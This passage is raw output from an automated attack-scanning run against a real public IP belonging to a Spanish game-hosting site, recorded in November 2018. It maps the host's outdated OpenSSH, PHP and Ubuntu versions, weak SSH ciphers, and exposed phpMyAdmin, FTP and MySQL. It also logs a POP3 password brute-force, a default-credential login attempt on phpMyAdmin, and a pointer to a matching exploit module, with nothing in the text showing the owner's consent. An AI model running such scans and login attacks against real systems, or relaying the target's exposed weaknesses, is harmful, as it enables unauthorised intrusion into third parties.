635. + -- --=[Port 22 opened... running tests...
636. #######################################################################################################################################
637. # general
638. (gen) banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
639. (gen) software: OpenSSH 5.9p1
640. (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
641. (gen) compression: enabled (zlib@openssh.com)
642.  
643. # key exchange algorithms
644. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
645. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
646. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
647. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
648. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
649. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
650. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
651. `- [info] available since OpenSSH 4.4
652. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
653. `- [warn] using weak hashing algorithm
654. `- [info] available since OpenSSH 2.3.0
655. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
656. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
657. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
658. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
659. `- [warn] using small 1024-bit modulus
660. `- [warn] using weak hashing algorithm
661. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
662.  
663. # host-key algorithms
664. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
665. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
666. `- [warn] using small 1024-bit modulus
667. `- [warn] using weak random number generator could reveal the key
668. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
669.  
670. # encryption algorithms (ciphers)
671. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
672. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
673. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
674. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
675. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
676. `- [warn] using weak cipher
677. `- [info] available since OpenSSH 4.2
678. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
679. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
680. `- [warn] using weak cipher
681. `- [info] available since OpenSSH 4.2
682. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
683. `- [warn] using weak cipher mode
684. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
685. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
686. `- [warn] using weak cipher
687. `- [warn] using weak cipher mode
688. `- [warn] using small 64-bit block size
689. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
690. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
691. `- [fail] disabled since Dropbear SSH 0.53
692. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
693. `- [warn] using weak cipher mode
694. `- [warn] using small 64-bit block size
695. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
696. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
697. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
698. `- [warn] using weak cipher mode
699. `- [warn] using small 64-bit block size
700. `- [info] available since OpenSSH 2.1.0
701. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
702. `- [warn] using weak cipher mode
703. `- [info] available since OpenSSH 2.3.0
704. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
705. `- [warn] using weak cipher mode
706. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
707. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
708. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
709. `- [warn] using weak cipher
710. `- [info] available since OpenSSH 2.1.0
711. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
712. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
713. `- [warn] using weak cipher mode
714. `- [info] available since OpenSSH 2.3.0
715.  
716. # message authentication code algorithms
717. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
718. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
719. `- [warn] using encrypt-and-MAC mode
720. `- [warn] using weak hashing algorithm
721. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
722. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
723. `- [warn] using weak hashing algorithm
724. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
725. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
726. `- [warn] using small 64-bit tag size
727. `- [info] available since OpenSSH 4.7
728. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
729. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
730. (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
731. `- [warn] using encrypt-and-MAC mode
732. `- [info] available since OpenSSH 5.9
733. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
734. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
735. (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
736. `- [warn] using encrypt-and-MAC mode
737. `- [info] available since OpenSSH 5.9
738. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
739. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
740. `- [warn] using encrypt-and-MAC mode
741. `- [info] available since OpenSSH 2.5.0
742. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
743. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
744. `- [warn] using encrypt-and-MAC mode
745. `- [info] available since OpenSSH 2.1.0
746. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
747. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
748. `- [warn] using encrypt-and-MAC mode
749. `- [warn] using weak hashing algorithm
750. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
751. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
752. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
753. `- [warn] using encrypt-and-MAC mode
754. `- [warn] using weak hashing algorithm
755. `- [info] available since OpenSSH 2.5.0
756.  
757. # algorithm recommendations (for OpenSSH 5.9)
758. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
759. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
760. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
761. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
762. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
763. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
764. (rec) -ssh-dss -- key algorithm to remove
765. (rec) -arcfour -- enc algorithm to remove
766. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
767. (rec) -blowfish-cbc -- enc algorithm to remove
768. (rec) -3des-cbc -- enc algorithm to remove
769. (rec) -aes256-cbc -- enc algorithm to remove
770. (rec) -arcfour256 -- enc algorithm to remove
771. (rec) -cast128-cbc -- enc algorithm to remove
772. (rec) -aes192-cbc -- enc algorithm to remove
773. (rec) -arcfour128 -- enc algorithm to remove
774. (rec) -aes128-cbc -- enc algorithm to remove
775. (rec) -hmac-md5-96 -- mac algorithm to remove
776. (rec) -hmac-sha2-256-96 -- mac algorithm to remove
777. (rec) -hmac-ripemd160 -- mac algorithm to remove
778. (rec) -hmac-sha1-96 -- mac algorithm to remove
779. (rec) -umac-64@openssh.com -- mac algorithm to remove
780. (rec) -hmac-md5 -- mac algorithm to remove
781. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
782. (rec) -hmac-sha1 -- mac algorithm to remove
783. (rec) -hmac-sha2-512-96 -- mac algorithm to remove
784. #######################################################################################################################################
785. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:32 EST
786. Nmap scan report for 5.135.156.30
787. Host is up (0.14s latency).
788.  
789. PORT STATE SERVICE VERSION
790. 22/tcp filtered ssh
791. Too many fingerprints match this host to give specific OS details
792. Network Distance: 7 hops
793.  
794. TRACEROUTE (using proto 1/icmp)
795. HOP RTT ADDRESS
796. 1 129.84 ms 10.248.200.1
797. 2 153.61 ms 185.94.189.129
798. 3 ...
799. 4 141.16 ms 94.23.122.146
800. 5 ... 6
801. 7 141.24 ms 5.135.156.30
802. #######################################################################################################################################
803. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:33 EST
804. Nmap scan report for 5.135.156.30
805. Host is up (0.14s latency).
806.  
807. PORT STATE SERVICE VERSION
808. 67/udp open|filtered dhcps
809. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
810. Too many fingerprints match this host to give specific OS details
811. Network Distance: 7 hops
812.  
813. TRACEROUTE (using proto 1/icmp)
814. HOP RTT ADDRESS
815. 1 134.74 ms 10.248.200.1
816. 2 162.79 ms 185.94.189.129
817. 3 ...
818. 4 141.35 ms 94.23.122.146
819. 5 ... 6
820. 7 146.63 ms 5.135.156.30
821. #######################################################################################################################################
822. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:35 EST
823. Nmap scan report for 5.135.156.30
824. Host is up (0.13s latency).
825.  
826. PORT STATE SERVICE VERSION
827. 68/udp open|filtered dhcpc
828. Too many fingerprints match this host to give specific OS details
829. Network Distance: 7 hops
830.  
831. TRACEROUTE (using proto 1/icmp)
832. HOP RTT ADDRESS
833. 1 123.56 ms 10.248.200.1
834. 2 180.82 ms 185.94.189.129
835. 3 ...
836. 4 188.24 ms 94.23.122.146
837. 5 ... 6
838. 7 134.99 ms 5.135.156.30
839.  
840. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
841. Nmap done: 1 IP address (1 host up) scanned in 139.43 seconds
842. + -- --=[Port 69 opened... running tests...
843. #######################################################################################################################################
844. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:37 EST
845. Nmap scan report for 5.135.156.30
846. Host is up (0.13s latency).
847.  
848. PORT STATE SERVICE VERSION
849. 69/udp open|filtered tftp
850. Too many fingerprints match this host to give specific OS details
851. Network Distance: 7 hops
852.  
853. TRACEROUTE (using proto 1/icmp)
854. HOP RTT ADDRESS
855. 1 122.62 ms 10.248.200.1
856. 2 122.66 ms 185.94.189.129
857. 3 ...
858. 4 134.93 ms 94.23.122.146
859. 5 ... 6
860. 7 134.20 ms 5.135.156.30
861. #######################################################################################################################################
862. ^ ^
863. _ __ _ ____ _ __ _ _ ____
864. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
865. | V V // o // _/ | V V // 0 // 0 // _/
866. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
867. <
868. ...'
869.  
870. WAFW00F - Web Application Firewall Detection Tool
871.  
872. By Sandro Gauci && Wendel G. Henrique
873.  
874. Checking http://5.135.156.30
875. Generic Detection results:
876. No WAF detected by the generic detection
877. Number of requests: 14
878. #######################################################################################################################################
879. http://5.135.156.30 [200 OK] Country[FRANCE][FR], Email[info@GameHosting.es,info@gamehosting.es], Google-Analytics[Universal][UA-60228867-1], IP[5.135.156.30], JQuery, Script[text/javascript], Strict-Transport-Security[max-age=63072000; includeSubdomains; preload], Title[Game Hosting Espa&ntildea], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]
880. #######################################################################################################################################
881.  
882. wig - WebApp Information Gatherer
883.  
884.  
885. Scanning http://5.135.156.30...
886. ___________________________________________ SITE INFO ___________________________________________
887. IP Title
888. 5.135.156.30 Game Hosting Espa&ntildea
889.  
890. ____________________________________________ VERSION ____________________________________________
891. Name Versions Type
892. Roundcube CMS
893. phpMyAdmin CMS
894. Apache 2.2.11 | 2.2.12 | 2.2.13 | 2.2.14 | 2.2.15 | 2.2.16 | 2.2.17 Platform
895. 2.2.18 | 2.2.19 | 2.2.20 | 2.2.21 | 2.2.22 | 2.2.23 | 2.2.24
896. 2.2.25 | 2.2.26 | 2.2.27 | 2.2.28 | 2.2.29 | 2.3.0 | 2.3.1
897. 2.3.10 | 2.3.11 | 2.3.12 | 2.3.13 | 2.3.14 | 2.3.15 | 2.3.16
898. 2.3.2 | 2.3.3 | 2.3.4 | 2.3.5 | 2.3.6 | 2.3.7 | 2.3.8
899. 2.3.9 | 2.4.0 | 2.4.1 | 2.4.2 | 2.4.3
900. PHP 5.3.10-1ubuntu3.21 Platform
901. Ubuntu 12.04 OS
902.  
903. _________________________________________________________________________________________________
904. Time: 23.0 sec Urls: 398 Fingerprints: 40401
905. #######################################################################################################################################
906. HTTP/1.1 200 OK
907. Date: Sun, 11 Nov 2018 17:41:17 GMT
908. Content-Type: text/html
909. Content-Length: 19427
910. Last-Modified: Sun, 22 Apr 2018 08:55:09 GMT
911. ETag: "1841322-4be3-56a6c140d9540"
912. Accept-Ranges: bytes
913. Vary: Accept-Encoding
914. Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
915. X-Frame-Options: SAMEORIGIN
916. X-Content-Type-Options: nosniff
917. Connection: keep-alive
918. #######################################################################################################################################
919. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:41 EST
920. Nmap scan report for 5.135.156.30
921. Host is up (0.13s latency).
922.  
923. PORT STATE SERVICE VERSION
924. 110/tcp open pop3 Dovecot pop3d
925. | pop3-brute:
926. | Accounts: No valid accounts found
927. | Statistics: Performed 31 guesses in 20 seconds, average tps: 1.6
928. |_ ERROR: Failed to connect.
929. |_pop3-capabilities: SASL(PLAIN LOGIN) USER TOP CAPA STLS UIDL RESP-CODES PIPELINING
930. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
931. Aggressive OS guesses: OpenWrt Kamikaze 7.09 (Linux 2.6.22) (96%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (94%), OpenWrt White Russian 0.9 (Linux 2.4.30) (94%), Linux 2.4.18 (92%), OpenWrt (Linux 3.3) (91%), OpenWrt Attitude Adjustment 12.09 (Linux 3.3) (91%), Linux 3.0 (89%), Crestron XPanel control system (89%), OpenWrt (Linux 2.4.30 - 2.4.34) (88%), OpenWrt (Linux 2.4.32) (88%)
932. No exact OS matches for host (test conditions non-ideal).
933. Network Distance: 1 hop
934.  
935. TRACEROUTE (using port 443/tcp)
936. HOP RTT ADDRESS
937. 1 126.02 ms 5.135.156.30
938. #######################################################################################################################################
939. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:42 EST
940. Nmap scan report for 5.135.156.30
941. Host is up (0.14s latency).
942.  
943. PORT STATE SERVICE VERSION
944. 123/udp open|filtered ntp
945. Too many fingerprints match this host to give specific OS details
946. Network Distance: 7 hops
947.  
948. TRACEROUTE (using proto 1/icmp)
949. HOP RTT ADDRESS
950. 1 129.05 ms 10.248.200.1
951. 2 129.08 ms 185.94.189.129
952. 3 ...
953. 4 141.47 ms 94.23.122.146
954. 5 ... 6
955. 7 141.12 ms 5.135.156.30
956. #######################################################################################################################################
957. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:44 EST
958. Nmap scan report for 5.135.156.30
959. Host is up (0.13s latency).
960.  
961. PORT STATE SERVICE VERSION
962. 161/tcp filtered snmp
963. 161/udp open|filtered snmp
964. Too many fingerprints match this host to give specific OS details
965. Network Distance: 7 hops
966.  
967. TRACEROUTE (using proto 1/icmp)
968. HOP RTT ADDRESS
969. 1 123.09 ms 10.248.200.1
970. 2 159.05 ms 185.94.189.129
971. 3 ...
972. 4 134.66 ms 94.23.122.146
973. 5 ...
974. 6 159.43 ms 178.33.100.206
975. 7 133.88 ms 5.135.156.30
976. #######################################################################################################################################
977.  
978. ^ ^
979. _ __ _ ____ _ __ _ _ ____
980. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
981. | V V // o // _/ | V V // 0 // 0 // _/
982. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
983. <
984. ...'
985.  
986. WAFW00F - Web Application Firewall Detection Tool
987.  
988. By Sandro Gauci && Wendel G. Henrique
989.  
990. Checking https://5.135.156.30
991. Generic Detection results:
992. No WAF detected by the generic detection
993. Number of requests: 14
994. #######################################################################################################################################
995. https://5.135.156.30 [200 OK] Country[FRANCE][FR], Email[info@GameHosting.es,info@gamehosting.es], Google-Analytics[Universal][UA-60228867-1], HTTPServer[nginx], IP[5.135.156.30], JQuery, Script[text/javascript], Strict-Transport-Security[max-age=63072000; includeSubdomains; preload], Title[Game Hosting Espa&ntildea], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], nginx
996. #######################################################################################################################################
997.  
998. AVAILABLE PLUGINS
999. -----------------
1000.  
1001. PluginCompression
1002. PluginCertInfo
1003. PluginSessionRenegotiation
1004. PluginHSTS
1005. PluginHeartbleed
1006. PluginSessionResumption
1007. PluginOpenSSLCipherSuites
1008. PluginChromeSha1Deprecation
1009.  
1010.  
1011.  
1012. CHECKING HOST(S) AVAILABILITY
1013. -----------------------------
1014.  
1015. 5.135.156.30:443 => 5.135.156.30:443
1016.  
1017.  
1018.  
1019. SCAN RESULTS FOR 5.135.156.30:443 - 5.135.156.30:443
1020. ----------------------------------------------------
1021.  
1022. * Session Renegotiation:
1023. Client-initiated Renegotiations: OK - Rejected
1024. Secure Renegotiation: OK - Supported
1025.  
1026. * Deflate Compression:
1027. OK - Compression disabled
1028.  
1029. * Session Resumption:
1030. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1031. With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
1032.  
1033. * Certificate - Content:
1034. SHA1 Fingerprint: 9df97c5a6bf8f7af0cf7cb1bcc7f6f1dfa613208
1035. Common Name: gamehosting.es
1036. Issuer: Let's Encrypt Authority X3
1037. Serial Number: 04AD2A61B2ECD0E25C959242703E514E51E0
1038. Not Before: Aug 18 00:36:11 2018 GMT
1039. Not After: Nov 16 00:36:11 2018 GMT
1040. Signature Algorithm: sha256WithRSAEncryption
1041. Public Key Algorithm: rsaEncryption
1042. Key Size: 2048 bit
1043. Exponent: 65537 (0x10001)
1044. X509v3 Subject Alternative Name: {'DNS': ['gamehosting.es']}
1045.  
1046. * Certificate - Trust:
1047. Hostname Validation: FAILED - Certificate does NOT match 5.135.156.30
1048. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1049. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1050. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1051. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1052. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1053. Certificate Chain Received: ['gamehosting.es']
1054.  
1055. * Certificate - OCSP Stapling:
1056. NOT SUPPORTED - Server did not send back an OCSP response.
1057.  
1058. * SSLV2 Cipher Suites:
1059. Server rejected all cipher suites.
1060.  
1061. * SSLV3 Cipher Suites:
1062. Server rejected all cipher suites.
1063.  
1064.  
1065.  
1066. SCAN COMPLETED IN 3.14 S
1067. ------------------------
1068. Version: 1.11.12-static
1069. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1070.  
1071. Connected to 5.135.156.30
1072.  
1073. Testing SSL server 5.135.156.30 on port 443 using SNI name 5.135.156.30
1074.  
1075. TLS Fallback SCSV:
1076. Server supports TLS Fallback SCSV
1077.  
1078. TLS renegotiation:
1079. Secure session renegotiation supported
1080.  
1081. TLS Compression:
1082. Compression disabled
1083.  
1084. Heartbleed:
1085. TLS 1.2 not vulnerable to heartbleed
1086. TLS 1.1 not vulnerable to heartbleed
1087. TLS 1.0 not vulnerable to heartbleed
1088.  
1089. Supported Server Cipher(s):
1090. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-384 DHE 384
1091. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-384 DHE 384
1092. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 4096 bits
1093. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 4096 bits
1094. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-384 DHE 384
1095. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-384 DHE 384
1096. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-384 DHE 384
1097. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-384 DHE 384
1098. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 4096 bits
1099. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 4096 bits
1100. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 4096 bits
1101. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 4096 bits
1102. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-384 DHE 384
1103. Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 4096 bits
1104. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
1105. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
1106. Accepted TLSv1.2 256 bits AES256-SHA256
1107. Accepted TLSv1.2 128 bits AES128-SHA256
1108. Accepted TLSv1.2 256 bits AES256-SHA
1109. Accepted TLSv1.2 128 bits AES128-SHA
1110. Accepted TLSv1.2 112 bits DES-CBC3-SHA
1111. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 4096 bits
1112. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
1113. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 4096 bits
1114. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
1115. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-384 DHE 384
1116. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-384 DHE 384
1117. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 4096 bits
1118. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 4096 bits
1119. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-384 DHE 384
1120. Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 4096 bits
1121. Accepted TLSv1.1 256 bits AES256-SHA
1122. Accepted TLSv1.1 128 bits AES128-SHA
1123. Accepted TLSv1.1 112 bits DES-CBC3-SHA
1124. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 4096 bits
1125. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
1126. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 4096 bits
1127. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
1128. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-384 DHE 384
1129. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-384 DHE 384
1130. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 4096 bits
1131. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 4096 bits
1132. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-384 DHE 384
1133.  
1134. SSL Certificate:
1135. Signature Algorithm: sha256WithRSAEncryption
1136. RSA Key Strength: 2048
1137.  
1138. Subject: gamehosting.es
1139. Altnames: DNS:gamehosting.es
1140. Issuer: Let's Encrypt Authority X3
1141.  
1142. Not valid before: Aug 18 00:36:11 2018 GMT
1143. Not valid after: Nov 16 00:36:11 2018 GMT
1144.  
1145. #######################################################################################################################################
1146.  
1147. I, [2018-11-11T12:50:04.928445 #8429] INFO -- : Initiating port scan
1148. I, [2018-11-11T12:50:44.042533 #8429] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-11_12-50-04.xml
1149. I, [2018-11-11T12:50:44.043501 #8429] INFO -- : Discovered open port: 5.135.156.30:80
1150. I, [2018-11-11T12:50:44.654355 #8429] INFO -- : Discovered open port: 5.135.156.30:443
1151. I, [2018-11-11T12:50:45.946143 #8429] INFO -- : Discovered open port: 5.135.156.30:8083
1152. I, [2018-11-11T12:50:47.186599 #8429] INFO -- : <<<Enumerating vulnerable applications>>>
1153. [+] Yasuo found phpMyAdmin at http://5.135.156.30:80/phpmyadmin/. May require form based auth
1154. I, [2018-11-11T12:52:28.428138 #8429] INFO -- : Double-checking if the application implements a login page and initiating login bruteforce, hold on tight...
1155. [+] Trying app-specific default creds first -> admin:admin
1156.  
1157. Could not find default login credentials, sucks
1158.  
1159.  
1160. --------------------------------------------------------
1161. <<<Yasuo discovered following vulnerable applications>>>
1162. --------------------------------------------------------
1163. +------------+------------------------------------+--------------------------------------------------+-----------+-----------+
1164. | App Name | URL to Application | Potential Exploit | Username | Password |
1165. +------------+------------------------------------+--------------------------------------------------+-----------+-----------+
1166. | phpMyAdmin | http://5.135.156.30:80/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
1167. +------------+------------------------------------+--------------------------------------------------+-----------+-----------+
1168. #######################################################################################################################################
1169. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:56 EST
1170. NSE: Loaded 148 scripts for scanning.
1171. NSE: Script Pre-scanning.
1172. Initiating NSE at 12:56
1173. Completed NSE at 12:56, 0.00s elapsed
1174. Initiating NSE at 12:56
1175. Completed NSE at 12:56, 0.00s elapsed
1176. Initiating Parallel DNS resolution of 1 host. at 12:56
1177. Completed Parallel DNS resolution of 1 host. at 12:56, 16.50s elapsed
1178. Initiating SYN Stealth Scan at 12:56
1179. Scanning 5.135.156.30 [474 ports]
1180. Discovered open port 22/tcp on 5.135.156.30
1181. Discovered open port 21/tcp on 5.135.156.30
1182. Discovered open port 80/tcp on 5.135.156.30
1183. Discovered open port 3306/tcp on 5.135.156.30
1184. Discovered open port 443/tcp on 5.135.156.30
1185. Completed SYN Stealth Scan at 12:56, 15.86s elapsed (474 total ports)
1186. Initiating Service scan at 12:56
1187. Scanning 5 services on 5.135.156.30
1188. Completed Service scan at 12:56, 14.04s elapsed (5 services on 1 host)
1189. Initiating OS detection (try #1) against 5.135.156.30
1190. Retrying OS detection (try #2) against 5.135.156.30
1191. Initiating Traceroute at 12:56
1192. Completed Traceroute at 12:56, 0.14s elapsed
1193. Initiating Parallel DNS resolution of 2 hosts. at 12:56
1194. Completed Parallel DNS resolution of 2 hosts. at 12:57, 16.50s elapsed
1195. NSE: Script scanning 5.135.156.30.
1196. Initiating NSE at 12:57
1197. Completed NSE at 12:57, 11.61s elapsed
1198. Initiating NSE at 12:57
1199. Completed NSE at 12:57, 0.00s elapsed
1200. Nmap scan report for 5.135.156.30
1201. Host is up (0.13s latency).
1202. Not shown: 423 filtered ports, 46 closed ports
1203. PORT STATE SERVICE VERSION
1204. 21/tcp open ftp ProFTPD or KnFTPD
1205. 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
1206. | ssh-hostkey:
1207. | 1024 1d:76:48:2e:45:64:f3:5f:69:3f:69:19:8b:ac:48:97 (DSA)
1208. |_ 2048 2b:5c:a8:b2:86:3b:96:e8:14:28:7a:e3:c9:31:e2:54 (RSA)
1209. 80/tcp open http nginx
1210. | http-methods:
1211. |_ Supported Methods: POST OPTIONS GET HEAD
1212. |_http-server-header: nginx
1213. |_http-title: Game Hosting Espa&ntildea
1214. 443/tcp open ssl/http nginx
1215. | http-methods:
1216. |_ Supported Methods: POST OPTIONS GET HEAD
1217. |_http-server-header: nginx
1218. |_http-title: 400 The plain HTTP request was sent to HTTPS port
1219. | ssl-cert: Subject: commonName=gamehosting.es
1220. | Subject Alternative Name: DNS:gamehosting.es
1221. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
1222. | Public Key type: rsa
1223. | Public Key bits: 2048
1224. | Signature Algorithm: sha256WithRSAEncryption
1225. | Not valid before: 2018-08-18T00:36:11
1226. | Not valid after: 2018-11-16T00:36:11
1227. | MD5: 291c ffe9 f8a1 460b c851 d127 4b75 939b
1228. |_SHA-1: 9df9 7c5a 6bf8 f7af 0cf7 cb1b cc7f 6f1d fa61 3208
1229. |_ssl-date: 2018-11-11T17:57:14+00:00; +1s from scanner time.
1230. | tls-nextprotoneg:
1231. |_ http/1.1
1232. 3306/tcp open mysql MySQL (blocked - too many connection errors)
